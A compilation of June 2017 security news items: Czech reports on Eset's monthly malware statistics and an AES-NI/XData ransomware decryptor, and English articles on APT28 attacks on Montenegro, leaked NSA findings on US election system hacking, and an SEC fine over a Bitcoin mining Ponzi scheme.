Hned několik měsíců po sobě byl v loňském i letošním roce nejrozšířenějším virem na světě škodlivý kód Danger. A situace se příliš nezměnila ani v květnu, kdy tento nezvaný návštěvník představoval nejčastější bezpečnostní hrozbu na českém internetu. Vyplývá to z pravidelné měsíční statistiky antivirové společnosti Eset.
„Zpětná analýza potvrdila naše dřívější tvrzení ohledně reálného dopadu ransomwaru WannaCry, který se České republice vyhnul. Obava uživatelů tedy nebyla na místě – hrozba byla jednak včas detekována a Česko navíc nebylo primárním cílem této kampaně. Na druhou stranu to však přimělo řadu firemních i domácích uživatelů k tomu, aby si uvědomili, že takové hrozby jsou reálné a je třeba přistupovat k IT bezpečnosti odpovědně,“ konstatoval Miroslav Dvořák, technický ředitel společnosti Eset.

Podle něj byl tak v uplynulém měsíci nejrozšířenější hrozbou právě Danger s téměř čtvrtinovým podílem. Tento virus, plným názvem JS/Danger.ScriptAttachment, je velmi nebezpečný. Otevírá totiž zadní vrátka do operačního systému. Útočníci pak díky němu mohou propašovat do napadeného počítače další škodlivé kódy, nejčastěji tak šíří vyděračské viry z rodiny ransomware.

Téměř desetinu detekovaných hrozeb pak představoval adware AztecMedia. „Jde o aplikaci, která je určena k doručování nevyžádaných reklam. Její kód se vkládá do webových stránek a uživateli otevírá v prohlížeči nevyžádaná pop-up okna nebo bannery s reklamou,“ vysvětluje Dvořák. Tento adware je nepříjemný i v tom, že dokáže bez vědomí uživatele změnit domovskou stránku internetového prohlížeče.

Zpomaluje počítač
„Adware ale není vir, uživatel musí s jeho instalací souhlasit. Obvykle se maskuje za užitečný doplněk internetových prohlížečů, který slibuje výrazné zrychlení práce s internetem. Opak je ale pravdou, adware počítač zpomaluje, protože ho zaměstnává otevíráním nevyžádaných reklam,“ upřesnil Dvořák.

Na třetí příčce nejčastěji detekovaných hrozeb se pak v květnu umístil trojský kůň Chromex, který přitom ještě o měsíc dříve atakoval nejvyšší příčku žebříčku. „Nyní je však již na ústupu, jeho podíl na květnových hrozbách činil 7,62 procenta oproti téměř 20 procentům v dubnu. Chromex se šíří prostřednictvím neoficiálních streamovacích stránek a může přesměrovat prohlížeč na konkrétní adresu URL se škodlivým softwarem,“ uzavřel Dvořák.

Přehled deseti nejrozšířenějších virových hrozeb za uplynulý měsíc naleznete v tabulce níže:

Top 10 hrozeb v České republice za květen 2017:
1. JS/Danger.ScriptAttachment (21,39 %)
2. JS/Adware.AztecMedia (8,81 %)
3. JS/Chromex.Submeliux (7,62 %)
4. Win32/GenKryptik (4,37 %)
5. JS/TrojanDownloader.Nemucod (3,77 %)
6. Java/Adwind (3,62 %)
7. Win32/Adware.ELEX (2,85 %)
8. PDF/TrojanDropper.Agent.AD (2,65 %)
9. Java/Kryptik.BK (2,59 %)
10. PDF/TrojanDropper.Agent.Z (2,04 %

Data zašifrovaná ransomwarem AES-NI a XData lze snadno dekódovat

7.6.2017 SecurityWorld Viry
Nástroj pro dešifrování zařízení napadených ransomwarem AES-NI, jejichž soubory byly zakódované škodlivými kódy Win32 / Filecoder.AESNI.B a Win32 / Filecoder.AESNI.C (známými také jako XData), představil Eset.
Dešifrovací nástroj proti AES-NI je založen na klíčích, jež byly nedávno zveřejněné na sociální síti Twitter a na internetovém fóru, které pomáhá obětem ransomwaru.

„Dešifrovací nástroj funguje na soubory zašifrované klíčem RSA, který používá verze ransomware AES-NI B, jež přidává k napadeným souborům přípony .aes256, .aes_ni a .aes_ni_0day, a také na data zašifrovaná ransomware ve verzi XData,“ vysvětluje Pavel Matějíček, manažer technické podpory v Esetu.

Oběti, jejichž soubory jsou stále zašifrované těmito variantami ransomware, si mohou stáhnout dešifrovací program zde.

Russian Hackers Target Montenegro as Country Joins NATO

7.6.2017 securityweek BigBrothers
Hackers linked to Russia launched cyberattacks on the Montenegro government just months before the country joined the North Atlantic Treaty Organization (NATO) and experts believe these attacks will likely continue.

Despite strong opposition from Russia, Montenegro officially joined NATO on June 5. Russia has threatened to retaliate but it may have already taken action against Montenegro in cyberspace.

Attacks aimed at the Montenegro government spotted earlier this year by security firm FireEye leveraged malware and exploits associated with the Russia-linked threat group known as APT28, Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit and Tsar Team.

APT28 has been known to target Montenegro. In the latest attacks observed by researchers, the hackers used spear-phishing emails to deliver malicious documents pertaining to a NATO secretary meeting and a visit by a European army unit to Montenegro. Experts believe the latter document may have been stolen and weaponized by the attackers.

The malware delivered in these attacks is tracked by FireEye as GAMEFISH and it has been exclusively used by APT28. GAMEFISH is a backdoor that is tracked by other security firms as Sednit, Seduploader, JHUHUGIT and Sofacy.

The malicious documents delivered the malware via a Flash exploit framework. FireEye has privately informed its customers about this framework, but it has not detailed it in any public reports. However, the company told SecurityWeek that this framework is also known as DealersChoice, which Palo Alto Networks analyzed in October 2016.

FireEye analyst Ben Read told SecurityWeek that the malicious documents first profile the targeted system in an effort to determine which version of Flash Player is present. A command and control (C&C) server is then contacted and the appropriate Flash exploit is downloaded. The exploits, which can include CVE-2015-7645 and CVE-2016-7855, are used to deliver GAMEFISH.

Read said it was unclear if APT28’s attacks against the Montenegro government were successful.

“It’s likely that this activity is a part of APT28’s continued focus on targeting various NATO member states, as well as the organization itself,” said Tony Cole, VP and CTO for Global Government at FireEye.

“Russia has strongly opposed Montenegro's NATO accession process and is likely to continue using cyber capabilities to undermine Montenegro's smooth integration into the alliance,” Cole added. “Montenegro's accession could increase cyber threat activity directed toward NATO, and provide additional avenues for adversaries like Russia to illicitly access NATO information.”

APT28 has been known to target NATO member countries, including by leveraging zero-day vulnerabilities. The group has also been involved in the recent U.S. election attacks.

While the threat actor is widely believed to be sponsored by the Russian government, Moscow has repeatedly denied the accusations. The country’s president, Vladimir Putin, recently claimed that patriotic hackers from Russia could be behind these attacks, but denied that the government is involved in hacking activities.

Leaked Documents Show US Vote Hacking Risks

7.6.2017 securityweek BigBrothers
Security experts have warned for years that hackers could penetrate electronic voting systems, and now, leaked national security documents suggest a concerted effort to do just that in the 2016 US election.

An intelligence report revealed this week showed a cyberattack that targeted more than 100 local election officials and software vendors, raising the prospect of an attempt, possibly led by Russia, to manipulate votes.

The top-secret document from the National Security Agency, published by online news outlet The Intercept, stops short of drawing any conclusions about the impact of the attacks and whether it affected any ballots. But it suggests hackers got deeper into US voting systems than previously believed.

"These are our worst fears," said Joseph Hall, chief technologist at the Center for Democracy and Technology, who researches voting systems.

"For over 15 years, I and a lot of other people have said we had never seen a confirmed hack of voting systems. We're not going to say that anymore."

Hall said systems could be vulnerable because localities that manage elections rely on private software sellers that may lack resources against a well-funded cyber adversary.

"A lot of those vendors are quite small," Hall said. "There's not a lot of hope when you have are going up against an 800-pound bear."

Russian President Vladimir Putin has denied any effort to influence the 2016 US election. But the report suggests meddling went beyond psychological warfare to an attack on voting systems themselves.

Hacking elections "has always been thought of as a theoretical possibility, but now we know it is a real threat," said Susan Greenhalgh, a researcher with the Verified Voting Foundation, an election systems monitor.

"We need to ensure our voting systems are resilient going into 2018 and 2020" elections, she added.

Alex Halderman, a University of Michigan computer scientist whose projects have included simulated hacking of voting machines, called the latest disclosures "significant."

"This shows Russia was interested in attacking the computer infrastructure that operated the election and raises important questions including how far they got," he told AFP.

While voting machines are not connected to the internet, most of the electronic systems need to be programmed with computers which are connected, opening up security holes.

"If you can manipulate that ballot programming you can often exploit the vulnerabilities," Halderman said, opening the door to vote tampering.

- Long-term impact -

Andrew Appel, a Princeton University computer science professor who has studied election systems, said that if the report is accurate and the cyberattack occurred days before the November vote, it would likely have been too late to affect the outcome.

But Appel said any tampering with vote systems could have serious and far-reaching effects.

"If this kind of attack had taken place weeks before the election, it would be cause for significant concern" for the outcome, he said.

"And it's many weeks now before the next election, and if there has been Russian penetration of our election software systems or anyone else's penetration, it could continue to affect vote counting for years."

Appel said that if ballots are manipulated within a voting machine, "it won't be obvious, people won't know about it" unless there is an audit or recount.

Most US states now use optical scanners with paper ballots that can be audited, but a handful employ paperless systems with no paper trail to verify the count.

"Internet elections are even more hackable, and I'm glad we're not doing that," Appel said.

Greenhalgh said that even though most jurisdictions have paper ballots which can be used for recounts, "the bad news is the vast majority of the country doesn't do an audit to catch any errors in the vote counting software."

Bruce Schneier, chief technology officer of IBM Resilient and a fellow at Harvard's Berkman Klein Center for Internet & Society, said the report shows the weaknesses of US election systems.

"This (attack) feels more exploratory than operational, but this is just one piece. There are lots of vulnerabilities," Schneier said. "Election officials are largely in denial. The next election will be no more secure than this election."

Creators of Bitcoin Miners Face $12 Million Fine for 'Ponzi Scheme' Scam
7.6.2017 thehackernews Spam
Creators of Bitcoin Miners Face $12 Million Fine for 'Ponzi Scheme' Scam
Every time a new topic trends on the Internet, scammers take advantage of it.
You must have heard of Bitcoin and how in recent days it has made some early investors millionaire overnight.
Yes, the Bitcoin boom is back, and it's real — a digital currency that has just crossed a new milestone today. The current price of 1 BTC or 1 Bitcoin = US$2,850.
An American con man took advantage of this boom in Bitcoin market to run bogus bitcoin mining schemes and earn millions of dollars.
But the bogus schemes ended as the United States Securities and Exchange Commission (SEC) has won a legal battle against two bogus, but now defunct, Bitcoin companies operated by Homero Joshua Garza — GAW Miners and ZenMiner.
Garza is now facing a $12 Million (£9.2 Million) penalty for running the bogus schemes – what lawmakers have certified was a "Ponzi scheme."
According to the SEC, Garza used the "lure of quick riches" in order to get people to invest in the bitcoin mining schemes, which means those who add their computing power to help verify transactions, a practice known as mining, are rewarded with Bitcoins.
Garza's GAW Miners and ZenMiner purported to provide shares in cloud-based Bitcoin mining machinery, but nothing like that was ever built by the operator.
Garza told investors that he had enough computing power to mine a lot of bitcoins on their behalf and share the proceeds, but in reality, he just used cash from new investors to reward earlier joiners, which is nothing but a fraudulent "ponzi" scheme, according to the SEC.
The SEC said: "Most investors paid for a share of computing power that never existed." It also said that about 10,000 investors joined the bogus schemes and handed over $20 Million to Garza.
Few got back their money they invested, but many left without a single penny.
The complaint against the Bitcoin mining schemes was filed on 1 December 2015, and on June 2, the US District of Connecticut federal court sided with the SEC, ordering both GAW Miners and ZenMiner to pay a combined of $10,384,099 in disgorgement and prejudgment interest, along with $1,000,000 in damages.
Both GAW Miners and ZenMiner companies have now been shut down.
However, a ruling is yet to be made on the Bitcoin funds collected by Garza. In 2014, when Garza was running the bogus schemes from his home in Connecticut, 1 BTC was equal to $450, and today it is around $2,800.
So, the $20 Million funds Garza took from the investors today worth around $150 million.